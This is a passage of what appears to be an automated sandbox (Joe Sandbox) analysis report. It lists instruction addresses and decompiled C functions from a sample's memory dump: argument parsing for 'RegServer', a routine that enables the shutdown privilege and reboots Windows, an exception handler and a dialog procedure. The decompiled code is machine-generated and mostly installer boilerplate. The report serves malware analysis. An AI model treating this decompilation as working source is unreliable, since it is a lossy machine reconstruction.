                                                                                                                                                                                                      0x00a65d84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d84
                                                                                                                                                                                                      0x00a65d5d
                                                                                                                                                                                                      0x00a65d5f
                                                                                                                                                                                                      0x00a65d62
                                                                                                                                                                                                      0x00a65d68
                                                                                                                                                                                                      0x00a65d64
                                                                                                                                                                                                      0x00a65d64
                                                                                                                                                                                                      0x00a65d64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d62
                                                                                                                                                                                                      0x00a65d5b
                                                                                                                                                                                                      0x00a65d4f
                                                                                                                                                                                                      0x00a65d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d9f
                                                                                                                                                                                                      0x00a65d9f
                                                                                                                                                                                                      0x00a65da5
                                                                                                                                                                                                      0x00a65dab
                                                                                                                                                                                                      0x00a65dba
                                                                                                                                                                                                      0x00a66218
                                                                                                                                                                                                      0x00a6621d
                                                                                                                                                                                                      0x00a66220
                                                                                                                                                                                                      0x00a66221
                                                                                                                                                                                                      0x00a66229
                                                                                                                                                                                                      0x00a66230
                                                                                                                                                                                                      0x00a66247
                                                                                                                                                                                                      0x00a6626a
                                                                                                                                                                                                      0x00a66272
                                                                                                                                                                                                      0x00a66249
                                                                                                                                                                                                      0x00a66255
                                                                                                                                                                                                      0x00a6625f
                                                                                                                                                                                                      0x00a66264
                                                                                                                                                                                                      0x00a66264
                                                                                                                                                                                                      0x00a66284
                                                                                                                                                                                                      0x00a65dc0
                                                                                                                                                                                                      0x00a65dc0
                                                                                                                                                                                                      0x00a65dca
                                                                                                                                                                                                      0x00a65e22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65dcc
                                                                                                                                                                                                      0x00a65dce
                                                                                                                                                                                                      0x00a65e24
                                                                                                                                                                                                      0x00a65e24
                                                                                                                                                                                                      0x00a65e2c
                                                                                                                                                                                                      0x00a65e47
                                                                                                                                                                                                      0x00a65e4a
                                                                                                                                                                                                      0x00a661d2
                                                                                                                                                                                                      0x00a661e2
                                                                                                                                                                                                      0x00a661e7
                                                                                                                                                                                                      0x00a661ee
                                                                                                                                                                                                      0x00a661f1
                                                                                                                                                                                                      0x00a661f1
                                                                                                                                                                                                      0x00a661f8
                                                                                                                                                                                                      0x00a661f8
                                                                                                                                                                                                      0x00a65e50
                                                                                                                                                                                                      0x00a65e53
                                                                                                                                                                                                      0x00a66109
                                                                                                                                                                                                      0x00a6611f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66125
                                                                                                                                                                                                      0x00a66137
                                                                                                                                                                                                      0x00a6613a
                                                                                                                                                                                                      0x00a6613c
                                                                                                                                                                                                      0x00a6613e
                                                                                                                                                                                                      0x00a6613e
                                                                                                                                                                                                      0x00a66141
                                                                                                                                                                                                      0x00a66141
                                                                                                                                                                                                      0x00a66143
                                                                                                                                                                                                      0x00a66144
                                                                                                                                                                                                      0x00a6614a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66150
                                                                                                                                                                                                      0x00a66152
                                                                                                                                                                                                      0x00a6615c
                                                                                                                                                                                                      0x00a66170
                                                                                                                                                                                                      0x00a66172
                                                                                                                                                                                                      0x00a6617c
                                                                                                                                                                                                      0x00a66190
                                                                                                                                                                                                      0x00a66190
                                                                                                                                                                                                      0x00a66196
                                                                                                                                                                                                      0x00a661a5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a661ab
                                                                                                                                                                                                      0x00a661b9
                                                                                                                                                                                                      0x00a661c6
                                                                                                                                                                                                      0x00a661c6
                                                                                                                                                                                                      0x00a6617e
                                                                                                                                                                                                      0x00a66180
                                                                                                                                                                                                      0x00a6618a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6618a
                                                                                                                                                                                                      0x00a6615e
                                                                                                                                                                                                      0x00a66160
                                                                                                                                                                                                      0x00a6616a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6616a
                                                                                                                                                                                                      0x00a6615c
                                                                                                                                                                                                      0x00a6614a
                                                                                                                                                                                                      0x00a6610b
                                                                                                                                                                                                      0x00a6610e
                                                                                                                                                                                                      0x00a6610e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65e59
                                                                                                                                                                                                      0x00a65e59
                                                                                                                                                                                                      0x00a65e5c
                                                                                                                                                                                                      0x00a6604f
                                                                                                                                                                                                      0x00a66056
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6605c
                                                                                                                                                                                                      0x00a6606e
                                                                                                                                                                                                      0x00a66071
                                                                                                                                                                                                      0x00a66073
                                                                                                                                                                                                      0x00a66075
                                                                                                                                                                                                      0x00a66075
                                                                                                                                                                                                      0x00a66078
                                                                                                                                                                                                      0x00a66078
                                                                                                                                                                                                      0x00a6607a
                                                                                                                                                                                                      0x00a6607b
                                                                                                                                                                                                      0x00a66081
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66087
                                                                                                                                                                                                      0x00a66087
                                                                                                                                                                                                      0x00a6608d
                                                                                                                                                                                                      0x00a6609c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a660a2
                                                                                                                                                                                                      0x00a660aa
                                                                                                                                                                                                      0x00a660b2
                                                                                                                                                                                                      0x00a660b7
                                                                                                                                                                                                      0x00a660bd
                                                                                                                                                                                                      0x00a660bf
                                                                                                                                                                                                      0x00a660bf
                                                                                                                                                                                                      0x00a660d6
                                                                                                                                                                                                      0x00a660e0
                                                                                                                                                                                                      0x00a660e7
                                                                                                                                                                                                      0x00a660f5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a660f5
                                                                                                                                                                                                      0x00a6609c
                                                                                                                                                                                                      0x00a66081
                                                                                                                                                                                                      0x00a65e62
                                                                                                                                                                                                      0x00a65e62
                                                                                                                                                                                                      0x00a65e65
                                                                                                                                                                                                      0x00a65fd3
                                                                                                                                                                                                      0x00a65fe9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65fef
                                                                                                                                                                                                      0x00a65fef
                                                                                                                                                                                                      0x00a65ff7
                                                                                                                                                                                                      0x00a65ffd
                                                                                                                                                                                                      0x00a66003
                                                                                                                                                                                                      0x00a66006
                                                                                                                                                                                                      0x00a66011
                                                                                                                                                                                                      0x00a66014
                                                                                                                                                                                                      0x00a6603d
                                                                                                                                                                                                      0x00a66016
                                                                                                                                                                                                      0x00a66018
                                                                                                                                                                                                      0x00a66019
                                                                                                                                                                                                      0x00a6601b
                                                                                                                                                                                                      0x00a66033
                                                                                                                                                                                                      0x00a6601d
                                                                                                                                                                                                      0x00a66020
                                                                                                                                                                                                      0x00a66029
                                                                                                                                                                                                      0x00a66022
                                                                                                                                                                                                      0x00a66022
                                                                                                                                                                                                      0x00a66022
                                                                                                                                                                                                      0x00a66020
                                                                                                                                                                                                      0x00a6601b
                                                                                                                                                                                                      0x00a66042
                                                                                                                                                                                                      0x00a66044
                                                                                                                                                                                                      0x00a66046
                                                                                                                                                                                                      0x00a6604a
                                                                                                                                                                                                      0x00a65ff7
                                                                                                                                                                                                      0x00a65fd5
                                                                                                                                                                                                      0x00a65fd8
                                                                                                                                                                                                      0x00a65fd8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65e6b
                                                                                                                                                                                                      0x00a65e6b
                                                                                                                                                                                                      0x00a65e6e
                                                                                                                                                                                                      0x00a65f8b
                                                                                                                                                                                                      0x00a65f99
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65f9f
                                                                                                                                                                                                      0x00a65fa7
                                                                                                                                                                                                      0x00a65faf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65fb1
                                                                                                                                                                                                      0x00a65fb3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65fb5
                                                                                                                                                                                                      0x00a65fb7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65fb9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65fb9
                                                                                                                                                                                                      0x00a65fb7
                                                                                                                                                                                                      0x00a65fb3
                                                                                                                                                                                                      0x00a65faf
                                                                                                                                                                                                      0x00a65f8d
                                                                                                                                                                                                      0x00a65f8d
                                                                                                                                                                                                      0x00a65f8d
                                                                                                                                                                                                      0x00a65f8f
                                                                                                                                                                                                      0x00a65fc1
                                                                                                                                                                                                      0x00a65fc1
                                                                                                                                                                                                      0x00a65fc1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65e74
                                                                                                                                                                                                      0x00a65e74
                                                                                                                                                                                                      0x00a65e77
                                                                                                                                                                                                      0x00a65ea0
                                                                                                                                                                                                      0x00a65ebd
                                                                                                                                                                                                      0x00a65f79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65f7f
                                                                                                                                                                                                      0x00a65ec3
                                                                                                                                                                                                      0x00a65ec3
                                                                                                                                                                                                      0x00a65ecc
                                                                                                                                                                                                      0x00a65ed4
                                                                                                                                                                                                      0x00a65ed6
                                                                                                                                                                                                      0x00a65edc
                                                                                                                                                                                                      0x00a65edf
                                                                                                                                                                                                      0x00a65eea
                                                                                                                                                                                                      0x00a65eed
                                                                                                                                                                                                      0x00a65f3f
                                                                                                                                                                                                      0x00a65f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65eef
                                                                                                                                                                                                      0x00a65eef
                                                                                                                                                                                                      0x00a65ef2
                                                                                                                                                                                                      0x00a65f34
                                                                                                                                                                                                      0x00a65ef4
                                                                                                                                                                                                      0x00a65ef4
                                                                                                                                                                                                      0x00a65ef7
                                                                                                                                                                                                      0x00a65f2b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65ef9
                                                                                                                                                                                                      0x00a65ef9
                                                                                                                                                                                                      0x00a65efc
                                                                                                                                                                                                      0x00a65f22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65efe
                                                                                                                                                                                                      0x00a65eff
                                                                                                                                                                                                      0x00a65f02
                                                                                                                                                                                                      0x00a65f16
                                                                                                                                                                                                      0x00a65f04
                                                                                                                                                                                                      0x00a65f07
                                                                                                                                                                                                      0x00a65f0d
                                                                                                                                                                                                      0x00a65f46
                                                                                                                                                                                                      0x00a65f46
                                                                                                                                                                                                      0x00a65f09
                                                                                                                                                                                                      0x00a65f09
                                                                                                                                                                                                      0x00a65f09
                                                                                                                                                                                                      0x00a65f07
                                                                                                                                                                                                      0x00a65f02
                                                                                                                                                                                                      0x00a65efc
                                                                                                                                                                                                      0x00a65ef7
                                                                                                                                                                                                      0x00a65ef2
                                                                                                                                                                                                      0x00a65f4c
                                                                                                                                                                                                      0x00a65f4e
                                                                                                                                                                                                      0x00a65f50
                                                                                                                                                                                                      0x00a65f54
                                                                                                                                                                                                      0x00a65ed4
                                                                                                                                                                                                      0x00a65ea2
                                                                                                                                                                                                      0x00a65ea4
                                                                                                                                                                                                      0x00a65eaf
                                                                                                                                                                                                      0x00a65eaf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65e79
                                                                                                                                                                                                      0x00a65e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65e83
                                                                                                                                                                                                      0x00a65e83
                                                                                                                                                                                                      0x00a65e83
                                                                                                                                                                                                      0x00a65e85
                                                                                                                                                                                                      0x00a65e85
                                                                                                                                                                                                      0x00a65e8e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65e94
                                                                                                                                                                                                      0x00a65e8e
                                                                                                                                                                                                      0x00a65e7d
                                                                                                                                                                                                      0x00a65e77
                                                                                                                                                                                                      0x00a65e6e
                                                                                                                                                                                                      0x00a65e65
                                                                                                                                                                                                      0x00a65e5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65dd0
                                                                                                                                                                                                      0x00a65dd0
                                                                                                                                                                                                      0x00a65dd0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65dd0
                                                                                                                                                                                                      0x00a65dce
                                                                                                                                                                                                      0x00a65dca
                                                                                                                                                                                                      0x00a65dba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65d00
                                                                                                                                                                                                      0x00a65dd9
                                                                                                                                                                                                      0x00a65e04
                                                                                                                                                                                                      0x00a661fe
                                                                                                                                                                                                      0x00a65e0a
                                                                                                                                                                                                      0x00a65e0c
                                                                                                                                                                                                      0x00a65e17
                                                                                                                                                                                                      0x00a65e17
                                                                                                                                                                                                      0x00a65e04
                                                                                                                                                                                                      0x00a66200
                                                                                                                                                                                                      0x00a66200
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 00A65CEE
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00A68B3E,00000104,00000000,?,?), ref: 00A65DFC
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00A65E3E
                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 00A65EE1
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A65F6F
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00A65FA7
                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 00A66008
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00A660AA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00A61140,00000000,00000040,00000000), ref: 00A661F1
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00A661F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                      • Opcode ID: 68bdde658855c25d2dfa1f51635fab7f98afa79b2a3a579bec5c7d8eedbd2677
                                                                                                                                                                                                      • Instruction ID: 315844093152daaaf6471512c24e759b94c72f161090cc3d4fa30df9c78d1b18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68bdde658855c25d2dfa1f51635fab7f98afa79b2a3a579bec5c7d8eedbd2677
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FD16F71E04A449FDF39CB788C487FA3BB5AB26344F1441AAD4C6D61D1DAB58E878F40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                                      			E00A61F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						if( *0xa69a40 != 0) {
                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                      							_t13 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								E00A644B9(0, _t37);
                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                      							return E00A66CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                      						_t28 = E00A644B9(0, 0x522, 0xa61140, 0, 0x40, 4);
                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = E00A61EA7(__ecx);
                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x00a61f90
                                                                                                                                                                                                      0x00a61f90
                                                                                                                                                                                                      0x00a61f93
                                                                                                                                                                                                      0x00a61f98
                                                                                                                                                                                                      0x00a61fa4
                                                                                                                                                                                                      0x00a61fa7
                                                                                                                                                                                                      0x00a61fc5
                                                                                                                                                                                                      0x00a61fcd
                                                                                                                                                                                                      0x00a61fdb
                                                                                                                                                                                                      0x00a61ee5
                                                                                                                                                                                                      0x00a61eea
                                                                                                                                                                                                      0x00a61ef1
                                                                                                                                                                                                      0x00a61ef4
                                                                                                                                                                                                      0x00a61f0c
                                                                                                                                                                                                      0x00a61f2e
                                                                                                                                                                                                      0x00a61f3a
                                                                                                                                                                                                      0x00a61f46
                                                                                                                                                                                                      0x00a61f4d
                                                                                                                                                                                                      0x00a61f58
                                                                                                                                                                                                      0x00a61f60
                                                                                                                                                                                                      0x00a61f61
                                                                                                                                                                                                      0x00a61f62
                                                                                                                                                                                                      0x00a61f75
                                                                                                                                                                                                      0x00a61f80
                                                                                                                                                                                                      0x00a61f77
                                                                                                                                                                                                      0x00a61f77
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61f77
                                                                                                                                                                                                      0x00a61f64
                                                                                                                                                                                                      0x00a61f64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61f64
                                                                                                                                                                                                      0x00a61f0e
                                                                                                                                                                                                      0x00a61f0e
                                                                                                                                                                                                      0x00a61f13
                                                                                                                                                                                                      0x00a61f13
                                                                                                                                                                                                      0x00a61f14
                                                                                                                                                                                                      0x00a61f14
                                                                                                                                                                                                      0x00a61f16
                                                                                                                                                                                                      0x00a61f17
                                                                                                                                                                                                      0x00a61f1a
                                                                                                                                                                                                      0x00a61f1f
                                                                                                                                                                                                      0x00a61f1f
                                                                                                                                                                                                      0x00a61f86
                                                                                                                                                                                                      0x00a61f8f
                                                                                                                                                                                                      0x00a61fcf
                                                                                                                                                                                                      0x00a61fd3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61fd3
                                                                                                                                                                                                      0x00a61fa9
                                                                                                                                                                                                      0x00a61fb4
                                                                                                                                                                                                      0x00a61fbb
                                                                                                                                                                                                      0x00a61fc3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61fc3
                                                                                                                                                                                                      0x00a61f9a
                                                                                                                                                                                                      0x00a61f9a
                                                                                                                                                                                                      0x00a61fa2
                                                                                                                                                                                                      0x00a61fd9
                                                                                                                                                                                                      0x00a61fda
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a61fa2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A61EFB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00A61F02
                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00A61FD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                      • Opcode ID: 715f581ad6c62c954ae82bba036c18e55fc95d11ed0e5bb1688f9a38ab2b4397
                                                                                                                                                                                                      • Instruction ID: 2cc060faf95443c27553bad74614fcca7caaaba429aac1eaf33d1ece22503964
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 715f581ad6c62c954ae82bba036c18e55fc95d11ed0e5bb1688f9a38ab2b4397
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8221C971B40205BBDB209BE19C4AFBF7EBCEB95B10F14051EFA02E6181DB758802D661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A66CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x00a66cf7
                                                                                                                                                                                                      0x00a66d00
                                                                                                                                                                                                      0x00a66d19

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A66E26,00A61000), ref: 00A66CF7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(00A66E26,?,00A66E26,00A61000), ref: 00A66D00
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00A66E26,00A61000), ref: 00A66D0B
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00A66E26,00A61000), ref: 00A66D12
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                      • Opcode ID: d80c6f61827b9aaca8064f658a3dca6b676a44a7f93b8d89882121e88e221bbc
                                                                                                                                                                                                      • Instruction ID: 039299948ffaebcb432ea30da2703526b8254f36ff79299b0745819218be9e38
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d80c6f61827b9aaca8064f658a3dca6b676a44a7f93b8d89882121e88e221bbc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86D0C932000108BBDB016BE1EC0CA593F38EB5A212F444100F319A2020CAB294528F52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                      			E00A63210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                      					E00A643D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                      					SetWindowTextA(_t64, "cent");
